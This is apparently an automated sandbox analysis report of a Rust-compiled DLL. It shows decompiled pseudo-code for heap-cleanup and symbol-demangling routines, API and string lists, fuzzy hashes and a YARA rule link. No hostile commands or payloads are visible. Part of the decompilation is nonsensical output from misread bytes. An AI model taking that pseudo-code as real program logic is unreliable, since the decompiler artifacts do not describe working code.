														__eflags =  *((short*)(_t268 + 0xc));
														if( *((short*)(_t268 + 0xc)) == 0) {
															break;
														} else {
															__eflags =  *((short*)(_t268 + 0xe));
															if( *((short*)(_t268 + 0xe)) == 0) {
																break;
															} else {
																_t228 = _t228 + 0xfffffff8;
																_t268 = _t268 + 0x10;
																__eflags = _t228 - 7;
																if(_t228 > 7) {
																	continue;
																} else {
																	goto L45;
																}
															}
														}
													}
												}
											}
										}
									}
									goto L96;
								}
								L48:
								_t223 = _v68;
								_v56 = 0x6ed606d8;
								_v60 = 0x1402;
								__eflags = _t223;
								if(_t223 != 0) {
									__eflags = _t148;
									if(_t148 != 0) {
										__eflags = _t223 & 0x7fffffff;
										if((_t223 & 0x7fffffff) != 0) {
											HeapFree( *0x6ed6e128, 0, _t148);
										}
									}
								}
								__eflags = _v60 - 3;
								if(_v60 == 3) {
									_t224 = _v56;
									_v36 = _t224;
									_t70 = _t224 + 4; // 0x2c
									_v20 = 2;
									 *((intOrPtr*)( *_t70))( *_t224);
									_t281 = _t281 + 4;
									_t179 = _v36;
									_t226 =  *((intOrPtr*)(_t179 + 4));
									__eflags =  *(_t226 + 4);
									if( *(_t226 + 4) != 0) {
										_t181 =  *_t179;
										__eflags =  *((intOrPtr*)(_t226 + 8)) - 9;
										if( *((intOrPtr*)(_t226 + 8)) >= 9) {
											_t181 =  *(_t181 - 4);
										}
										HeapFree( *0x6ed6e128, 0, _t181);
										_t179 = _v56;
									}
									HeapFree( *0x6ed6e128, 0, _t179);
								}
								L75:
								 *_v76 = 0;
								L76:
								_t151 = _v28;
								 *[fs:0x0] = _t151;
								return _t151;
							}
							goto L96;
						}
					}
				} else {
					_t142 = GetProcessHeap();
					if(_t142 == 0) {
						L94:
						_t239 = 2;
						E6ED392F0(_t192, 0xa, 2, _t245, _t262, __eflags);
						asm("ud2");
						L95:
						E6ED39470(_t192, _t245, _t239, _t245, _t262, __eflags, 0x6ed606e0);
						asm("ud2");
						__eflags =  &_a8;
						E6ED148D0( *_v44,  *((intOrPtr*)(_v44 + 4)));
						return E6ED1D270(_t263);
					} else {
						 *0x6ed6e128 = _t142;
						goto L3;
					}
				}
				L96:
			}

APIs

GetProcessHeap.KERNEL32 ref: 6ED1D3BC
HeapAlloc.KERNEL32(00810000,00000000,0000000A), ref: 6ED1D3D3

Strings

RUST_BACKTRACE, xrefs: 6ED1D48A, 6ED1D4C0

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocProcess
String ID: RUST_BACKTRACE
API String ID: 1617791916-3454309823
Opcode ID: 20d738a67192d6742d0f0d62439ff57260696a6f4d470c85b0c0b81499986eb8
Instruction ID: 8163e6bba5c4f3c77798d3c319e7bc7f44c6c1b762b32b15894c4154c7254cae
Opcode Fuzzy Hash: 20d738a67192d6742d0f0d62439ff57260696a6f4d470c85b0c0b81499986eb8
Instruction Fuzzy Hash: 7B02BAB1E08218CFEB14CFD8E8907DDB7B1AF49315F244129E559BB280D774A981CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED175F4, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E6ED175F4(signed int __ecx, void* __eflags) {
				intOrPtr _t127;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				signed int _t133;
				void* _t134;
				intOrPtr* _t136;
				intOrPtr* _t138;
				intOrPtr* _t140;
				intOrPtr* _t150;
				intOrPtr* _t153;
				intOrPtr* _t154;
				signed int* _t155;
				signed int _t157;
				signed int _t158;
				signed int _t162;
				signed int _t164;
				signed int _t165;
				signed int _t167;
				signed int _t170;
				signed int _t171;
				void* _t173;
				void* _t175;
				signed int _t176;
				signed int _t180;
				signed int _t181;
				signed int _t183;
				signed int _t184;
				signed int _t196;
				void* _t198;
				void* _t200;
				signed char _t201;
				signed int* _t203;
				signed char _t204;
				signed int _t207;
				signed char _t208;
				intOrPtr _t212;
				signed int _t215;
				signed int _t216;
				signed int _t218;
				char* _t220;
				char* _t221;
				signed int _t222;
				signed int _t225;
				signed int _t226;
				signed int _t238;
				signed int _t239;
				signed int _t241;
				signed int _t245;
				intOrPtr _t250;
				signed char _t251;
				signed int _t258;
				intOrPtr _t268;
				unsigned int _t273;
				void* _t281;
				char* _t282;
				signed short _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				char* _t295;
				signed int _t303;
				signed int _t307;
				void* _t308;
				void* _t311;
				void* _t312;
				signed int* _t313;
				void* _t316;

				_pop(_t127);
				if(__eflags != 0) {
					 *((intOrPtr*)(_t308 + 0x10)) = _t250;
					_t251 =  *(__ecx + 4);
					 *((intOrPtr*)(_t308 + 0x14)) = _t127;
					 *(_t308 + 4) = __ecx;
					__eflags = _t251;
					if(_t251 == 0) {
						L19:
						_t288 =  *(_t308 + 4);
						_t214 =  *(_t288 + 0x14);
						__eflags =  *(_t288 + 0x14);
						if( *(_t288 + 0x14) == 0) {
							L21:
							 *_t288 = 1;
							goto L22;
						} else {
							_push(0x10);
							_t129 = E6ED11C10(_t214,  &M6ED5F395);
							_t215 = 1;
							__eflags = _t129;
							if(_t129 == 0) {
								goto L21;
							}
						}
						goto L23;
					} else {
						_t130 =  *(_t308 + 4);
						_t216 =  *(_t130 + 0xc);
						_t131 =  *(_t130 + 8);
						__eflags = _t216 - _t131;
						 *(_t308 + 0xc) = _t216;
						 *(_t308 + 8) = _t131;
						if(_t216 < _t131) {
							_t290 =  *(_t308 + 4);
							_t279 = 0xffffffff;
							_t133 =  *(_t308 + 0xc) + 1;
							__eflags = _t133;
							_t218 =  ~( *(_t308 + 8));
							while(1) {
								__eflags = _t218 + _t133 - 1;
								if(_t218 + _t133 == 1) {
									goto L19;
								}
								_t196 =  *(_t251 + _t133 - 1) & 0x000000ff;
								 *(_t290 + 0xc) = _t133;
								_t133 = _t133 + 1;
								_t279 = _t279 + 1;
								_t198 = _t196 + 0xd0;
								__eflags = _t198 - 0xa;
								if(_t198 < 0xa) {
									continue;
								} else {
									_t200 = _t198 + 0x9f;
									__eflags = _t200 - 6;
									if(_t200 < 6) {
										continue;
									} else {
										__eflags = _t200 - 0x5f;
										if(_t200 != 0x5f) {
											goto L19;
										} else {
											_t291 =  *(_t308 + 0xc);
											_t134 = _t133 + 0xfffffffe;
											_t201 = _t251;
											__eflags = _t134 - _t291;
											if(_t134 < _t291) {
												L38:
												E6ED39620(_t201,  *(_t308 + 8), _t291, _t134, 0x6ed5f33c);
												_t311 = _t308 + 0xc;
												asm("ud2");
												goto L39;
											} else {
												__eflags = _t291;
												if(_t291 == 0) {
													L13:
													_t209 = _t201 + _t291;
													_t268 = _t308 + 0x18;
													 *((intOrPtr*)(_t308 + 0x18)) = _t201 + _t291;
													 *(_t308 + 0x1c) = _t279;
													E6ED18560(_t308 + 0x20, _t268);
													__eflags =  *(_t308 + 0x20);
													if( *(_t308 + 0x20) == 0) {
														_t291 =  *( *(_t308 + 4) + 0x14);
														__eflags = _t291;
														if(_t291 == 0) {
															goto L22;
														} else {
															_push(2);
															_t180 = E6ED11C10(_t291, 0x6ed5f427);
															_t316 = _t308 + 4;
															_t215 = 1;
															__eflags = _t180;
															if(_t180 != 0) {
																goto L23;
															} else {
																_push(_t279);
																_t181 = E6ED11C10(_t291, _t209);
																_t215 = 1;
																_t311 = _t316 + 4;
																goto L34;
															}
														}
													} else {
														_t183 =  *( *(_t308 + 4) + 0x14);
														__eflags = _t183;
														if(_t183 == 0) {
															goto L22;
														} else {
															 *(_t308 + 8) = _t183;
															_t212 =  *((intOrPtr*)(_t308 + 0x2c));
															_t184 =  *(_t308 + 0x28);
															__eflags = _t184 - 0x2710;
															asm("sbb ecx, 0x0");
															if(_t184 < 0x2710) {
																_t238 = 0x27;
															} else {
																_t241 = 0x27;
																asm("o16 nop [cs:eax+eax]");
																do {
																	 *(_t308 + 4) = _t241;
																	 *(_t308 + 0xc) = _t184;
																	_t286 = E6ED2C5D0(_t184, _t212, 0x2710, 0);
																	_t184 = E6ED2C650(_t184, _t212, 0x2710, 0);
																	_t245 = ((_t286 & 0x0000ffff) >> 2) * 0x147b >> 0x11;
																	__eflags = 0x5f5e0ff -  *(_t308 + 0xc);
																	asm("sbb esi, ebx");
																	_t303 =  *(_t308 + 4);
																	_t212 = _t268;
																	 *((short*)(_t308 + _t303 + 0x31)) =  *(_t245 + _t245 + "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899") & 0x0000ffff;
																	 *((short*)(_t308 + _t303 + 0x33)) =  *((_t286 - _t245 * 0x00000064 & 0x0000ffff) + (_t286 - _t245 * 0x00000064 & 0x0000ffff) + "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899") & 0x0000ffff;
																	_t241 = _t303 - 4;
																} while (0x5f5e0ff <  *(_t308 + 0xc));
															}
															_t279 =  *(_t308 + 8);
															__eflags = _t184 - 0x63;
															if(_t184 > 0x63) {
																_t273 = _t184 & 0x0000ffff;
																_t184 = (_t273 >> 2) * 0x147b >> 0x11;
																 *((short*)(_t308 + _t238 + 0x33)) =  *((_t273 - _t184 * 0x00000064 & 0x0000ffff) + (_t273 - _t184 * 0x00000064 & 0x0000ffff) + "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899") & 0x0000ffff;
																_t238 = _t238 + 0xfffffffe;
																__eflags = _t238;
															}
															__eflags = _t184 - 0xa;
															if(_t184 >= 0xa) {
																 *((short*)(_t308 + _t238 + 0x33)) =  *(_t184 + _t184 + "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899") & 0x0000ffff;
																_t239 = _t238 + 0xfffffffe;
																__eflags = _t239;
															} else {
																 *((char*)(_t308 + _t238 + 0x34)) = _t184 + 0x30;
																_t239 = _t238 - 1;
															}
															__eflags = 0x27;
															_push(0x27 - _t239);
															_t291 = _t279;
															_push(_t308 + _t239 + 0x35);
															_push(0);
															_t181 = E6ED118D0(_t279, 0x6ed5f570);
															_t311 = _t308 + 0xc;
															_t215 = 1;
															L34:
															__eflags = _t181;
															if(_t181 != 0) {
																goto L23;
															} else {
																__eflags =  *_t291 & 0x00000004;
																if(( *_t291 & 0x00000004) != 0) {
																	goto L22;
																} else {
																	_t201 =  *((intOrPtr*)(_t311 + 0x10)) + 0x9f;
																	__eflags = _t201 - 0x19;
																	if(__eflags <= 0) {
																		_t279 = _t201 & 0x000000ff;
																		_t134 = 4;
																		_t201 =  *((intOrPtr*)(_t311 + 0x14)) +  *((intOrPtr*)(0x6ed179d8 + (_t201 & 0x000000ff) * 4));
																		goto __ebx;
																	}
																	L39:
																	_t220 = "called `Option::unwrap()` on a `None` value";
																	_t136 = E6ED394E0(_t201, _t220, 0x2b, _t279, _t291, __eflags, 0x6ed5f42c);
																	_t312 = _t311 + 4;
																	asm("ud2");
																	asm("stosb");
																	 *((intOrPtr*)(_t220 - 0x46fffffd)) =  *((intOrPtr*)(_t220 - 0x46fffffd)) + _t201;
																	_t138 = _t136 +  *_t136 +  *((intOrPtr*)(_t136 +  *_t136));
																	_t140 = _t138 +  *_t138 +  *((intOrPtr*)(_t138 +  *_t138));
																	_t221 =  &(_t220[_t140]);
																	_t203 = _t201 + _t138 + _t201 + _t138;
																	 *_t291 =  *_t291 + _t221;
																	 *0x2b =  *0x2b + _t203;
																	_t150 = _t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))))) + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))))) + _t221)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))))) + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))))) + _t221))));
																	 *_t291 =  *_t291 + _t150;
																	 *0x2b =  *0x2b + 0x56;
																	 *_t221 =  *_t221 + _t203;
																	_t153 = _t150 +  *_t150 +  *((intOrPtr*)(_t150 +  *_t150)) +  *((intOrPtr*)(_t150 +  *_t150 +  *((intOrPtr*)(_t150 +  *_t150))));
																	 *((intOrPtr*)(_t153 + 3)) =  *((intOrPtr*)(_t153 + 3)) + _t153;
																	 *_t153 =  *_t153 + _t153;
																	asm("enter 0x3, 0x0");
																	asm("enter 0x3, 0x0");
																	_t154 = _t153 +  *_t153;
																	_t203[0] = _t203[0] + 0x56;
																	 *_t154 =  *_t154 + _t154;
																	_pop(_t281);
																	_t155 = _t154 +  *_t154;
																	_t203[0] = _t203[0] + _t221;
																	 *_t155 = _t155 +  *_t155;
																	__eflags =  *_t155;
																	asm("enter 0x3, 0x0");
																	if( *_t155 <= 0) {
																		 *_t155 = _t155 +  *_t155;
																		 *_t203 =  *_t203;
																		__eflags =  *_t203;
																	}
																	_t76 = _t281 + 0x55000003;
																	 *_t76 =  *(_t281 + 0x55000003) + _t221;
																	__eflags =  *_t76;
																	_push(_t203);
																	_push(_t281);
																	_push(_t291);
																	_t313 = _t312 - 0x24;
																	__eflags =  *_t221 - 1;
																	_t282 = _t221;
																	if( *_t221 != 1) {
																		_t222 =  *(_t282 + 8);
																		_t292 =  *(_t282 + 0xc);
																		_t157 =  *(_t282 + 4);
																		__eflags = _t292 - _t222;
																		_t313[3] = _t222;
																		if(_t292 >= _t222) {
																			L53:
																			__eflags = _t157;
																			if(_t157 == 0) {
																				L67:
																				_t204 = 0;
																				goto L72;
																			} else {
																				_t313[1] = 0x56;
																				_t258 = 0;
																				__eflags = _t292 - _t313[3];
																				_t204 = 0;
																				 *_t313 = _t292;
																				if(_t292 >= _t313[3]) {
																					goto L72;
																				} else {
																					_t313[2] = _t157;
																					_t225 = 0;
																					__eflags = 0;
																					_t307 =  *_t313 + 1;
																					_t164 = _t313[2];
																					asm("o16 nop [cs:eax+eax]");
																					while(1) {
																						_t165 =  *(_t164 + _t307 - 1) & 0x000000ff;
																						__eflags = _t165 - 0x5f;
																						if(_t165 == 0x5f) {
																							break;
																						}
																						_t207 = _t165 + 0xd0;
																						__eflags = _t207 - 0xa;
																						if(__eflags < 0) {
																							L63:
																							_t295 = _t282;
																							 *(_t282 + 0xc) = _t307;
																							_t170 = _t225;
																							_t208 = _t207 & 0xffffff00 | __eflags > 0x00000000;
																							_t171 = _t170 * 0x3e;
																							_t258 = (_t170 * 0x3e >> 0x20) + _t258 * 0x3e;
																							if(__eflags != 0) {
																								_t204 = 0;
																								__eflags = 0;
																								goto L71;
																							} else {
																								_t204 = 0;
																								_t225 = _t171 + (_t208 & 0x000000ff);
																								__eflags = _t225;
																								asm("adc edx, 0x0");
																								if(_t225 < 0) {
																									L71:
																									_t282 = _t295;
																									goto L72;
																								} else {
																									__eflags = _t313[3] - _t307;
																									_t164 = _t313[2];
																									_t307 = _t307 + 1;
																									_t282 = _t295;
																									if(__eflags != 0) {
																										continue;
																									} else {
																										goto L72;
																									}
																								}
																							}
																						} else {
																							_t173 = _t165 + 0x9f;
																							__eflags = _t173 - 0x1a;
																							if(__eflags >= 0) {
																								_t175 = _t173 + 0xbf;
																								__eflags = _t175 - 0x1a;
																								if(_t175 >= 0x1a) {
																									goto L67;
																								} else {
																									_t176 = _t175 + 0xe3;
																									__eflags = _t176;
																									goto L62;
																								}
																							} else {
																								_t176 = _t173 + 0xa9;
																								L62:
																								_t207 = _t176;
																								goto L63;
																							}
																						}
																						goto L76;
																					}
																					_t204 = 0;
																					_t226 = _t225 + 1;
																					__eflags = _t226;
																					 *(_t282 + 0xc) = _t307;
																					asm("adc edx, 0x0");
																					if(_t226 < 0) {
																						goto L72;
																					} else {
																						_t292 =  *_t313;
																						goto L49;
																					}
																				}
																			}
																		} else {
																			__eflags = _t157;
																			if(_t157 == 0) {
																				goto L53;
																			} else {
																				__eflags =  *((char*)(_t157 + _t292)) - 0x5f;
																				if( *((char*)(_t157 + _t292)) != 0x5f) {
																					goto L53;
																				} else {
																					_t313[1] = 0x56;
																					_t226 = 0;
																					__eflags = 0;
																					 *(_t282 + 0xc) = _t292 + 1;
																					L49:
																					_t204 = 0;
																					__eflags = _t226 - _t292 - 1;
																					asm("sbb edx, 0x0");
																					if(_t226 >= _t292 - 1) {
																						L72:
																						_t223 =  *(_t282 + 0x14);
																						__eflags =  *(_t282 + 0x14);
																						if( *(_t282 + 0x14) == 0) {
																							L74:
																							 *_t282 = 1;
																							 *(_t282 + 1) = _t204;
																							goto L75;
																						} else {
																							__eflags = _t204;
																							_t257 =  !=  ? "{recursion limit reached}{invalid syntax}" :  &M6ED5F395;
																							_push((_t204 & 0x000000ff) + 0x10 + (_t204 & 0x000000ff) * 8);
																							_t162 = E6ED11C10(_t223,  !=  ? "{recursion limit reached}{invalid syntax}" :  &M6ED5F395);
																							_t313 =  &(_t313[1]);
																							_t158 = 1;
																							__eflags = _t162;
																							if(_t162 == 0) {
																								goto L74;
																							}
																						}
																					} else {
																						_t204 = 1;
																						_t167 =  *(_t282 + 0x10) + 1;
																						__eflags = _t167 - 0x1f4;
																						if(_t167 > 0x1f4) {
																							goto L72;
																						} else {
																							__eflags =  *(_t282 + 0x14);
																							if( *(_t282 + 0x14) == 0) {
																								goto L75;
																							} else {
																								asm("movsd xmm0, [edi]");
																								asm("movsd xmm1, [edi+0x8]");
																								 *_t282 = 0;
																								 *(_t282 + 0xc) = _t226;
																								 *(_t282 + 0x10) = _t167;
																								_t313[8] =  *(_t282 + 0x10);
																								__eflags = _t313[1];
																								asm("movsd [esp+0x18], xmm1");
																								asm("movsd [esp+0x10], xmm0");
																								_t158 = E6ED16D90(_t282);
																								asm("movsd xmm0, [esp+0x10]");
																								asm("movsd xmm1, [esp+0x18]");
																								asm("movsd [edi], xmm0");
																								asm("movsd [edi+0x8], xmm1");
																								 *(_t282 + 0x10) = _t313[8];
																							}
																						}
																					}
																				}
																			}
																		}
																		goto L76;
																	} else {
																		_t232 =  *(_t282 + 0x14);
																		__eflags =  *(_t282 + 0x14);
																		if( *(_t282 + 0x14) == 0) {
																			L75:
																			_t158 = 0;
																			__eflags = 0;
																			L76:
																		} else {
																			_push(1);
																			_t158 = E6ED11C10(_t232, "?\'for<, >  as ::{shimclosure#[]dyn  + ; mut const  unsafe extern \"");
																		}
																	}
																	return _t158;
																}
															}
														}
													}
												} else {
													__eflags =  *((char*)(_t201 + _t291)) - 0xbf;
													if( *((char*)(_t201 + _t291)) <= 0xbf) {
														goto L38;
													} else {
														goto L13;
													}
												}
											}
										}
									}
								}
								goto L78;
							}
						}
						goto L19;
					}
				} else {
					_t249 =  *((intOrPtr*)(__ecx + 0x14));
					if( *((intOrPtr*)(__ecx + 0x14)) == 0) {
						L22:
						_t215 = 0;
						__eflags = 0;
					} else {
						_push(1);
						_t215 = E6ED11C10(_t249, "?\'for<, >  as ::{shimclosure#[]dyn  + ; mut const  unsafe extern \"");
					}
					L23:
					return _t215;
				}
				L78:
			}

0x6ed175f4
0x6ed175f5
0x6ed17618
0x6ed1761c
0x6ed1761f
0x6ed17623
0x6ed17627
0x6ed17629
0x6ed17786
0x6ed17786
0x6ed1778a
0x6ed1778d
0x6ed1778f
0x6ed177a6
0x6ed177a6
0x00000000
0x6ed17791
0x6ed17796
0x6ed17798
0x6ed177a0
0x6ed177a2
0x6ed177a4
0x00000000
0x00000000
0x6ed177a4
0x00000000
0x6ed1762f
0x6ed1762f
0x6ed17633
0x6ed17636
0x6ed17639
0x6ed1763b
0x6ed1763f
0x6ed17643
0x6ed17651
0x6ed17655
0x6ed1765a
0x6ed1765a
0x6ed1765b
0x6ed17660
0x6ed17663
0x6ed17666
0x00000000
0x00000000
0x6ed1766e
0x6ed17673
0x6ed17676
0x6ed17677
0x6ed1767a
0x6ed1767d
0x6ed17680
0x00000000
0x6ed17682
0x6ed17684
0x6ed17687
0x6ed1768a
0x00000000
0x6ed1768c
0x6ed1768c
0x6ed1768f
0x00000000
0x6ed17695
0x6ed17695
0x6ed17699
0x6ed1769c
0x6ed1769e
0x6ed176a0
0x6ed179a5
0x6ed179b2
0x6ed179b7
0x6ed179ba
0x00000000
0x6ed176a6
0x6ed176a6
0x6ed176a8
0x6ed176b4
0x6ed176b4
0x6ed176ba
0x6ed176be
0x6ed176c2
0x6ed176c6
0x6ed176cb
0x6ed176d0
0x6ed177bb
0x6ed177be
0x6ed177c0
0x00000000
0x6ed177c2
0x6ed177c9
0x6ed177cb
0x6ed177d0
0x6ed177d3
0x6ed177d5
0x6ed177d7
0x00000000
0x6ed177d9
0x6ed177dd
0x6ed177de
0x6ed177e3
0x6ed177e5
0x00000000
0x6ed177e5
0x6ed177d7
0x6ed176d6
0x6ed176da
0x6ed176dd
0x6ed176df
0x00000000
0x6ed176e5
0x6ed176e5
0x6ed176e9
0x6ed176ed
0x6ed176f1
0x6ed176f8
0x6ed176fb
0x6ed177ea
0x6ed17701
0x6ed17701
0x6ed17706
0x6ed17710
0x6ed17710
0x6ed17716
0x6ed17728
0x6ed17733
0x6ed17744
0x6ed17759
0x6ed17762
0x6ed17764
0x6ed17768
0x6ed1776a
0x6ed1777a
0x6ed1777f
0x6ed1777f
0x6ed17784
0x6ed177ef
0x6ed177f3
0x6ed177f6
0x6ed177f8
0x6ed17806
0x6ed17819
0x6ed1781e
0x6ed1781e
0x6ed1781e
0x6ed17821
0x6ed17824
0x6ed17837
0x6ed1783c
0x6ed1783c
0x6ed17826
0x6ed17828
0x6ed1782c
0x6ed1782c
0x6ed1784d
0x6ed17851
0x6ed17852
0x6ed17854
0x6ed17855
0x6ed17857
0x6ed1785c
0x6ed1785f
0x6ed17861
0x6ed17861
0x6ed17863
0x00000000
0x6ed17869
0x6ed17869
0x6ed1786c
0x00000000
0x6ed17872
0x6ed17876
0x6ed17879
0x6ed1787c
0x6ed17882
0x6ed17890
0x6ed17895
0x6ed1789c
0x6ed1789c
0x6ed179bc
0x6ed179bc
0x6ed179cb
0x6ed179d0
0x6ed179d3
0x6ed179d8
0x6ed179db
0x6ed179e1
0x6ed179e9
0x6ed179eb
0x6ed179f7
0x6ed179fb
0x6ed17a03
0x6ed17a05
0x6ed17a07
0x6ed17a0b
0x6ed17a0f
0x6ed17a11
0x6ed17a13
0x6ed17a16
0x6ed17a18
0x6ed17a1c
0x6ed17a21
0x6ed17a23
0x6ed17a26
0x6ed17a28
0x6ed17a29
0x6ed17a2b
0x6ed17a2e
0x6ed17a2e
0x6ed17a30
0x6ed17a34
0x6ed17a36
0x6ed17a38
0x6ed17a38
0x6ed17a38
0x6ed17a3b
0x6ed17a3b
0x6ed17a3b
0x6ed17a41
0x6ed17a42
0x6ed17a43
0x6ed17a44
0x6ed17a47
0x6ed17a4a
0x6ed17a4c
0x6ed17a6d
0x6ed17a70
0x6ed17a73
0x6ed17a76
0x6ed17a78
0x6ed17a7c
0x6ed17b22
0x6ed17b22
0x6ed17b24
0x6ed17be2
0x6ed17be2
0x00000000
0x6ed17b2a
0x6ed17b2a
0x6ed17b2e
0x6ed17b30
0x6ed17b34
0x6ed17b39
0x6ed17b3c
0x00000000
0x6ed17b42
0x6ed17b42
0x6ed17b49
0x6ed17b49
0x6ed17b4b
0x6ed17b4e
0x6ed17b52
0x6ed17b60
0x6ed17b60
0x6ed17b65
0x6ed17b67
0x00000000
0x00000000
0x6ed17b6b
0x6ed17b6e
0x6ed17b71
0x6ed17b9e
0x6ed17ba5
0x6ed17ba7
0x6ed17bb3
0x6ed17bb5
0x6ed17bb8
0x6ed17bba
0x6ed17bc1
0x6ed17bfb
0x6ed17bfb
0x00000000
0x6ed17bc3
0x6ed17bc8
0x6ed17bca
0x6ed17bca
0x6ed17bcc
0x6ed17bcf
0x6ed17bfd
0x6ed17bfd
0x00000000
0x6ed17bd1
0x6ed17bd1
0x6ed17bd5
0x6ed17bd9
0x6ed17bdc
0x6ed17bde
0x00000000
0x6ed17be0
0x00000000
0x6ed17be0
0x6ed17bde
0x6ed17bcf
0x6ed17b73
0x6ed17b75
0x6ed17b78
0x6ed17b7b
0x6ed17b92
0x6ed17b95
0x6ed17b98
0x00000000
0x6ed17b9a
0x6ed17b9a
0x6ed17b9a
0x00000000
0x6ed17b9a
0x6ed17b7d
0x6ed17b7d
0x6ed17b9c
0x6ed17b9c
0x00000000
0x6ed17b9c
0x6ed17b7b
0x00000000
0x6ed17b71
0x6ed17be6
0x6ed17be8
0x6ed17be8
0x6ed17beb
0x6ed17bee
0x6ed17bf1
0x00000000
0x6ed17bf3
0x6ed17bf3
0x00000000
0x6ed17bf3
0x6ed17bf1
0x6ed17b3c
0x6ed17a82
0x6ed17a82
0x6ed17a84
0x00000000
0x6ed17a8a
0x6ed17a8a
0x6ed17a8e
0x00000000
0x6ed17a94
0x6ed17a94
0x6ed17a9b
0x6ed17a9d
0x6ed17a9f
0x6ed17aa2
0x6ed17aa3
0x6ed17aa5
0x6ed17aa7
0x6ed17aaa
0x6ed17bff
0x6ed17bff
0x6ed17c02
0x6ed17c04
0x6ed17c2d
0x6ed17c2d
0x6ed17c30
0x00000000
0x6ed17c06
0x6ed17c10
0x6ed17c12
0x6ed17c1c
0x6ed17c1d
0x6ed17c22
0x6ed17c27
0x6ed17c29
0x6ed17c2b
0x00000000
0x00000000
0x6ed17c2b
0x6ed17ab0
0x6ed17ab3
0x6ed17ab5
0x6ed17ab6
